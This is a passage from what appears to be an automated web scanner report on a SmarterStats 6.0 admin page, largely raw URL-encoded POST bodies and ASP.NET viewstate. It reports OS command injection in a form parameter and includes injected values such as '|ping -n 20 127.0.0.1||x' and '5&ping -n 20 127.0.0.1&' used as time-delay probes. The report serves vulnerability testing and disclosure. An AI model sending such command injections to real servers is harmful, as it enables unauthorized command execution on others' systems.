ZXNfU2V0dGluZ0NoZWNrQm94JDE1BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE2BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE3BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE4BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE5BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIwBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIxBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIxBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMQ8y1gsAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRZjdGwwMCRNUEgkZ3JkU2VvU3RhdHVzDwU6VHJ1ZXxUcnVlfHxUcnVlfFRydWV8bGFzdFByb2Nlc3NpbmdEYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW04DzLaCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQFNFT1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADFNFT1N0YXR1c1RhYgtkOM5P3EdqRgSfYoIjJCDTiv3sZp5ktoudiy8rNReMpN8%3D&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5%26ping%20-n%2020%20127.0.0.1%26&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:32:20 GMT
Content-Length: 0


1.6. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00_MPH_grdLogLocations_HiddenLSR parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00_MPH_grdLogLocations_HiddenLSR parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the ctl00_MPH_grdLogLocations_HiddenLSR parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGF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0ZXIgNCBtb250aHMVRGVsZXRlIGFmdGVyIDUgbW9udGhzFURlbGV0ZSBhZnRlciA2IG1vbnRocxVEZWxldGUgYWZ0ZXIgNyBtb250aHMVRGVsZXRlIGFmdGVyIDggbW9udGhzFURlbGV0ZSBhZnRlciA5IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTAgbW9udGhzFkRlbGV0ZSBhZnRlciAxMSBtb250aHMWRGVsZXRlIGFmdGVyIDEyIG1vbnRocxZEZWxldGUgYWZ0ZXIgMTMgbW9udGhzFkRlbGV0ZSBhZnRlciAxNCBtb250aHMWRGVsZXRlIGFmdGVyIDE1IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTYgbW9udGhzFkRlbGV0ZSBhZnRlciAxNyBtb250aHMWRGVsZXRlIGFmdGVyIDE4IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTkgbW9udGhzFkRlbGV0ZSBhZnRlciAyMCBtb250aHMWRGVsZXRlIGFmdGVyIDIxIG1vbnRocxZEZWxldGUgYWZ0ZXIgMjIgbW9udGhzFkRlbGV0ZSBhZnRlciAyMyBtb250aHMWRGVsZXRlIGFmdGVyIDI0IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjUgbW9udGhzFkRlbGV0ZSBhZnRlciAyNiBtb250aHMWRGVsZXRlIGFmdGVyIDI3IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjggbW9udGhzFkRlbGV0ZSBhZnRlciAyOSBtb250aHMWRGVsZXRlIGFmdGVyIDMwIG1vbnRocxZEZWxldGUgYWZ0ZXIgMzEgbW9udGhzFkRlbGV0ZSBhZnRlciAzMiBtb250aHMWRGVsZXRlIGFmdGVyIDMzIG1vbnRocxZEZWxldGUgYWZ0ZXIgMzQgbW9udGhzFkRlbGV0ZSBhZnRlciAzNSBtb250aHMWRGVsZXRlIGFmdGVyIDM2IG1vbnRocxUlATABMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzECMzICMzMCMzQCMzUCMz